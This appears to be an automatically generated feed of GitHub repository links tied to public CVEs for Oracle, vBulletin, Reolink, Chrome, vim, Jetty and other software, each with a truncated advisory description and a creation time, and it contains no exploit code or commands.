**vBulletin 5.5.4 through 5.6.2 allows remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-17496](https://github.com/Live-Hack-CVE/CVE-2020-17496) create time: 2022-12-28T21:16:08Z

**Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 5.2.40, prior to 6.0.20 and prior to 6.1.6. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox execute CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2894](https://github.com/Live-Hack-CVE/CVE-2020-2894) create time: 2022-12-28T22:05:55Z

**Vulnerability in the Oracle Solaris product of Oracle Systems (component: Common Desktop Environment). The supported version that is affected is 10. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. While the vuln CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2696](https://github.com/Live-Hack-CVE/CVE-2020-2696) create time: 2022-12-28T22:05:39Z

**Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Discovery Framework). Supported versions that are affected are 12.1.0.5, 13.2.0.0 and 13.3.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Enterprise Ma CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2617](https://github.com/Live-Hack-CVE/CVE-2020-2617) create time: 2022-12-28T22:05:36Z

**Vulnerability in the Enterprise Manager Base Platform product of Oracle Enterprise Manager (component: Connector Framework). Supported versions that are affected are 12.1.0.5, 13.2.0.0 and 13.3.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Enterprise Ma CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2642](https://github.com/Live-Hack-CVE/CVE-2020-2642) create time: 2022-12-28T22:05:32Z

**Vulnerability in the Oracle Solaris product of Oracle Systems (component: X Window System). Supported versions that are affected are 10 and 11. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle Solaris executes to compromise Oracle Solaris. Successful attacks CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2656](https://github.com/Live-Hack-CVE/CVE-2020-2656) create time: 2022-12-28T22:05:27Z

**Vulnerability in the PeopleSoft Enterprise PeopleTools product of Oracle PeopleSoft (component: Elastic Search). Supported versions that are affected are 8.56 and 8.57. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise PeopleSoft Enterprise PeopleTools. Successf CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2687](https://github.com/Live-Hack-CVE/CVE-2020-2687) create time: 2022-12-28T22:05:24Z

**Vulnerability in the Siebel UI Framework product of Oracle Siebel CRM (component: UIF Open UI). Supported versions that are affected are 19.7 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Siebel UI Framework. Successful attacks of this vulnerabili CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2559](https://github.com/Live-Hack-CVE/CVE-2020-2559) create time: 2022-12-28T22:05:20Z

**Vulnerability in the Oracle AutoVue product of Oracle Supply Chain (component: Security). The supported version that is affected is 21.0.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle AutoVue. Successful attacks of this vulnerability can result in u CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2592](https://github.com/Live-Hack-CVE/CVE-2020-2592) create time: 2022-12-28T22:05:16Z

**Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Object Migration). Supported versions that are affected are 8.0.4-8.0.8. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to com CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2688](https://github.com/Live-Hack-CVE/CVE-2020-2688) create time: 2022-12-28T22:05:13Z

**Vulnerability in the Oracle Demantra Demand Management product of Oracle Supply Chain (component: Security). Supported versions that are affected are 12.2.4, 12.2.4.1, 12.2.5 and 12.2.5.1. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Demantra Demand CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2557](https://github.com/Live-Hack-CVE/CVE-2020-2557) create time: 2022-12-28T22:05:09Z

**Vulnerability in the Oracle Solaris product of Oracle Systems (component: Kernel). The supported version that is affected is 11. Easily exploitable vulnerability allows unauthenticated attacker with network access via SMB to compromise Oracle Solaris. While the vulnerability is in Oracle Solaris, attacks may significan CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2558](https://github.com/Live-Hack-CVE/CVE-2020-2558) create time: 2022-12-28T22:05:06Z

**Vulnerability in the Primavera P6 Enterprise Project Portfolio Management product of Oracle Construction and Engineering (component: Core). Supported versions that are affected are 16.2.0.0-16.2.19.0, 17.12.0.0-17.12.16.0, 18.8.0.0-18.8.16.0, 19.12.0.0 and 20.1.0.0. Easily exploitable vulnerability allows low privilege CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2556](https://github.com/Live-Hack-CVE/CVE-2020-2556) create time: 2022-12-28T22:05:02Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: WLS Core Components). Supported versions that are affected are 10.3.6.0.0 and 12.1.3.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Succes CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2552](https://github.com/Live-Hack-CVE/CVE-2020-2552) create time: 2022-12-28T22:04:59Z

**Vulnerability in the Oracle Coherence product of Oracle Fusion Middleware (component: Caching,CacheStore,Invocation). Supported versions that are affected are 3.7.1.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2555](https://github.com/Live-Hack-CVE/CVE-2020-2555) create time: 2022-12-28T22:04:28Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: WLS Core Components). The supported version that is affected is 10.3.6.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks o CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2549](https://github.com/Live-Hack-CVE/CVE-2020-2549) create time: 2022-12-28T22:04:24Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: WLS Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2551](https://github.com/Live-Hack-CVE/CVE-2020-2551) create time: 2022-12-28T22:04:21Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: WLS Core Components). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows high privileged attacker with logon to the infrastructure where Oracle Web CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2550](https://github.com/Live-Hack-CVE/CVE-2020-2550) create time: 2022-12-28T22:04:17Z

**Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Console). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Se CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2519](https://github.com/Live-Hack-CVE/CVE-2020-2519) create time: 2022-12-28T22:04:14Z

**Vulnerability in the Core RDBMS component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Index, Create Table privilege with network access via OracleNet to compromise Core RDBMS. While th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2527](https://github.com/Live-Hack-CVE/CVE-2020-2527) create time: 2022-12-28T22:04:10Z

**Vulnerability in the Core RDBMS component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows high privileged attacker having Create Materialized View, Create Table privilege with network access via OracleNet to compromise Core RDB CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2516](https://github.com/Live-Hack-CVE/CVE-2020-2516) create time: 2022-12-28T22:03:59Z

**Vulnerability in the Java VM component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows low privileged attacker having Create Session privilege with network access via multiple protocols to compromise Java VM. Succes CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2518](https://github.com/Live-Hack-CVE/CVE-2020-2518) create time: 2022-12-28T22:03:56Z

**Vulnerability in the Core RDBMS component of Oracle Database Server. Supported versions that are affected are 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows low privileged attacker having Create Session privilege with network access via OracleNet to compromise Core RDBMS. While the vulnerabili CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2511](https://github.com/Live-Hack-CVE/CVE-2020-2511) create time: 2022-12-28T22:03:45Z

**Vulnerability in the Database Gateway for ODBC component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows unauthenticated attacker with network access via OracleNet to compromise Database Gateway for ODBC. Successful CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2512](https://github.com/Live-Hack-CVE/CVE-2020-2512) create time: 2022-12-28T22:03:42Z

**Vulnerability in the Database Gateway for ODBC component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows low privileged attacker having Create Session privilege with network access via OracleNet to compromise Databa CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-2515](https://github.com/Live-Hack-CVE/CVE-2020-2515) create time: 2022-12-28T22:03:39Z

**An improper authorization of using debugging command in Secure Folder prior to SMR Oct-2020 Release 1 allows unauthorized access to contents in Secure Folder via debugging command. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-25382](https://github.com/Live-Hack-CVE/CVE-2021-25382) create time: 2022-12-28T22:02:47Z

**The vulnerability could expose cleartext credentials from AVEVA InTouch Runtime 2020 R2 and all prior versions (WindowViewer) if an authorized, privileged user creates a diagnostic memory dump of the process and saves it to a non-protected location. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-32942](https://github.com/Live-Hack-CVE/CVE-2021-32942) create time: 2022-12-28T21:59:10Z

**A heap-based buffer over-read was discovered in the invert_pt_dynamic function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27796](https://github.com/Live-Hack-CVE/CVE-2020-27796) create time: 2022-12-28T21:58:52Z

**HashiCorp Consul Enterprise version 1.7.0 up to 1.8.4 includes a namespace replication bug which can be triggered to cause denial of service via infinite Raft writes. Fixed in 1.7.9 and 1.8.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25201](https://github.com/Live-Hack-CVE/CVE-2020-25201) create time: 2022-12-28T21:56:58Z

**HashiCorp Consul and Consul Enterprise 1.2.0 up to 1.8.5 allowed operators with operator:read ACL permissions to read the Connect CA private key configuration. Fixed in 1.6.10, 1.7.10, and 1.8.6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28053](https://github.com/Live-Hack-CVE/CVE-2020-28053) create time: 2022-12-28T21:56:54Z

**HashiCorp Consul and Consul Enterprise up to version 1.9.4 key-value (KV) raw mode was vulnerable to cross-site scripting. Fixed in 1.9.5, 1.8.10 and 1.7.14. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25864](https://github.com/Live-Hack-CVE/CVE-2020-25864) create time: 2022-12-28T21:56:47Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. Login param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44388](https://github.com/Live-Hack-CVE/CVE-2021-44388) create time: 2022-12-28T22:08:19Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetPtzPreset param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44387](https://github.com/Live-Hack-CVE/CVE-2021-44387) create time: 2022-12-28T22:08:15Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetPtzPatrol param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44386](https://github.com/Live-Hack-CVE/CVE-2021-44386) create time: 2022-12-28T22:07:57Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetPtzTattern param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44384](https://github.com/Live-Hack-CVE/CVE-2021-44384) create time: 2022-12-28T22:07:54Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetAutoUpgrade param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44383](https://github.com/Live-Hack-CVE/CVE-2021-44383) create time: 2022-12-28T22:07:50Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot.SetIrLights param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44382](https://github.com/Live-Hack-CVE/CVE-2021-44382) create time: 2022-12-28T22:07:47Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetPowerLed param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44381](https://github.com/Live-Hack-CVE/CVE-2021-44381) create time: 2022-12-28T22:07:43Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetTime param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44380](https://github.com/Live-Hack-CVE/CVE-2021-44380) create time: 2022-12-28T22:07:40Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetAutoMaint param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44379](https://github.com/Live-Hack-CVE/CVE-2021-44379) create time: 2022-12-28T22:07:36Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetEnc param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44378](https://github.com/Live-Hack-CVE/CVE-2021-44378) create time: 2022-12-28T22:07:32Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetIsp param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44376](https://github.com/Live-Hack-CVE/CVE-2021-44376) create time: 2022-12-28T22:07:29Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetMask param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44374](https://github.com/Live-Hack-CVE/CVE-2021-44374) create time: 2022-12-28T22:07:25Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetAutoFocus param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44373](https://github.com/Live-Hack-CVE/CVE-2021-44373) create time: 2022-12-28T22:07:22Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetLocalLink param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44372](https://github.com/Live-Hack-CVE/CVE-2021-44372) create time: 2022-12-28T22:07:18Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetImage param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44377](https://github.com/Live-Hack-CVE/CVE-2021-44377) create time: 2022-12-28T22:07:14Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetEmail param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44371](https://github.com/Live-Hack-CVE/CVE-2021-44371) create time: 2022-12-28T22:07:11Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetFtp param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44370](https://github.com/Live-Hack-CVE/CVE-2021-44370) create time: 2022-12-28T22:07:00Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetNtp param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44369](https://github.com/Live-Hack-CVE/CVE-2021-44369) create time: 2022-12-28T22:06:56Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetNetPort param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44368](https://github.com/Live-Hack-CVE/CVE-2021-44368) create time: 2022-12-28T22:06:53Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetUpnp param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44367](https://github.com/Live-Hack-CVE/CVE-2021-44367) create time: 2022-12-28T22:06:49Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetDevName param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44365](https://github.com/Live-Hack-CVE/CVE-2021-44365) create time: 2022-12-28T22:06:46Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetWifi param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44364](https://github.com/Live-Hack-CVE/CVE-2021-44364) create time: 2022-12-28T22:06:42Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetPush param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44363](https://github.com/Live-Hack-CVE/CVE-2021-44363) create time: 2022-12-28T22:06:38Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. Set3G param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44361](https://github.com/Live-Hack-CVE/CVE-2021-44361) create time: 2022-12-28T22:06:13Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetNorm param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44360](https://github.com/Live-Hack-CVE/CVE-2021-44360) create time: 2022-12-28T22:06:10Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetCrop param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44359](https://github.com/Live-Hack-CVE/CVE-2021-44359) create time: 2022-12-28T22:06:06Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetRec param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44358](https://github.com/Live-Hack-CVE/CVE-2021-44358) create time: 2022-12-28T22:06:03Z

**A denial of service vulnerability exists in the cgiserver.cgi JSON command parser functionality of reolink RLC-410W v3.0.0.136_20121102. A specially-crafted HTTP request can lead to a reboot. SetCloudSchedule param is not object. An attacker can send an HTTP request to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-44362](https://github.com/Live-Hack-CVE/CVE-2021-44362) create time: 2022-12-28T22:05:59Z

**The HM Multiple Roles WordPress plugin before 1.3 does not have any access control to prevent low privilege users to set themselves as admin via their profile page CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-24602](https://github.com/Live-Hack-CVE/CVE-2021-24602) create time: 2022-12-28T22:05:51Z

**BinderHub is a kubernetes-based cloud service that allows users to share reproducible interactive computing environments from code repositories. In affected versions a remote code execution vulnerability has been identified in BinderHub, where providing BinderHub with maliciously crafted input could execute code in the CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-39159](https://github.com/Live-Hack-CVE/CVE-2021-39159) create time: 2022-12-28T22:05:47Z

**File Manager for CVE-2022-446689** : [mineek/FileManager](https://github.com/mineek/FileManager) create time: 2022-12-28T22:13:35Z

**Out-of-bounds Read in GitHub repository vim/vim prior to 9.0.0212. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2816](https://github.com/Live-Hack-CVE/CVE-2022-2816) create time: 2022-12-28T22:04:03Z

**Buffer Over-read in GitHub repository vim/vim prior to 9.0.0218. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2845](https://github.com/Live-Hack-CVE/CVE-2022-2845) create time: 2022-12-28T22:02:50Z

**Use After Free in GitHub repository vim/vim prior to 9.0.0213. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2817](https://github.com/Live-Hack-CVE/CVE-2022-2817) create time: 2022-12-28T22:02:43Z

**Inappropriate implementation in Web Cursor in Google Chrome prior to 100.0.4896.60 allowed a remote attacker who had compromised the renderer process to obscure the contents of the Omnibox (URL bar) via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1138](https://github.com/Live-Hack-CVE/CVE-2022-1138) create time: 2022-12-28T22:01:54Z

**Inappropriate implementation in Extensions in Google Chrome prior to 100.0.4896.60 allowed an attacker who convinced a user to install a malicious extension to leak potentially sensitive information via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1137](https://github.com/Live-Hack-CVE/CVE-2022-1137) create time: 2022-12-28T22:01:50Z

**Use after free in Tab Strip in Google Chrome prior to 100.0.4896.60 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via specific set of user gestures. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1136](https://github.com/Live-Hack-CVE/CVE-2022-1136) create time: 2022-12-28T22:01:46Z

**Inappropriate implementation in Background Fetch API in Google Chrome prior to 100.0.4896.60 allowed a remote attacker to leak cross-origin data via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1139](https://github.com/Live-Hack-CVE/CVE-2022-1139) create time: 2022-12-28T22:01:35Z

**Type confusion in V8 in Google Chrome prior to 100.0.4896.60 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1134](https://github.com/Live-Hack-CVE/CVE-2022-1134) create time: 2022-12-28T22:01:21Z

**Use after free in WebRTC Perf in Google Chrome prior to 100.0.4896.60 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1133](https://github.com/Live-Hack-CVE/CVE-2022-1133) create time: 2022-12-28T22:01:17Z

**Inappropriate implementation in Virtual Keyboard in Google Chrome on Chrome OS prior to 100.0.4896.60 allowed a local attacker to bypass navigation restrictions via physical access to the device. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1132](https://github.com/Live-Hack-CVE/CVE-2022-1132) create time: 2022-12-28T22:01:13Z

**Use after free in Shopping Cart in Google Chrome prior to 100.0.4896.60 allowed a remote attacker to potentially exploit heap corruption via standard feature user interaction. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1135](https://github.com/Live-Hack-CVE/CVE-2022-1135) create time: 2022-12-28T22:00:58Z

**Inappropriate implementation in Web Share API in Google Chrome on Windows prior to 100.0.4896.60 allowed an attacker on the local network segment to leak cross-origin data via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1128](https://github.com/Live-Hack-CVE/CVE-2022-1128) create time: 2022-12-28T22:00:54Z

**Inappropriate implementation in Full Screen Mode in Google Chrome on Android prior to 100.0.4896.60 allowed a remote attacker to spoof the contents of the Omnibox (URL bar) via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1129](https://github.com/Live-Hack-CVE/CVE-2022-1129) create time: 2022-12-28T22:00:43Z

**Use after free in Cast UI in Google Chrome prior to 100.0.4896.60 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1131](https://github.com/Live-Hack-CVE/CVE-2022-1131) create time: 2022-12-28T22:00:39Z

**Insufficient validation of trust input in WebOTP in Google Chrome on Android prior to 100.0.4896.60 allowed a remote attacker to send arbitrary intents from any app via a malicious app. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1130](https://github.com/Live-Hack-CVE/CVE-2022-1130) create time: 2022-12-28T22:00:35Z

**In Eclipse Jetty versions 9.4.0 thru 9.4.46, and 10.0.0 thru 10.0.9, and 11.0.0 thru 11.0.9 versions, the parsing of the authority segment of an http scheme URI, the Jetty HttpURI class improperly detects an invalid input as a hostname. This can lead to failures in a Proxy scenario. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2047](https://github.com/Live-Hack-CVE/CVE-2022-2047) create time: 2022-12-28T22:00:31Z

**An issue was discovered in Softing OPC UA C++ SDK 5.66 through 6.x before 6.10. An OPC/UA browse request exceeding the server limit on continuation points may cause a use-after-free error CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39823](https://github.com/Live-Hack-CVE/CVE-2022-39823) create time: 2022-12-28T21:59:57Z

**In Eclipse Jetty HTTP/2 server implementation, when encountering an invalid HTTP/2 request, the error handling has a bug that can wind up not properly cleaning up the active connections and associated resources. This can lead to a Denial of Service scenario where there are no enough resources left to process good reque CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2048](https://github.com/Live-Hack-CVE/CVE-2022-2048) create time: 2022-12-28T21:59:39Z

**An issue was discovered in Softing OPC UA C++ SDK before 6.10. A buffer overflow or an excess allocation happens due to unchecked array and matrix bounds in structure data types. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37453](https://github.com/Live-Hack-CVE/CVE-2022-37453) create time: 2022-12-28T21:59:29Z

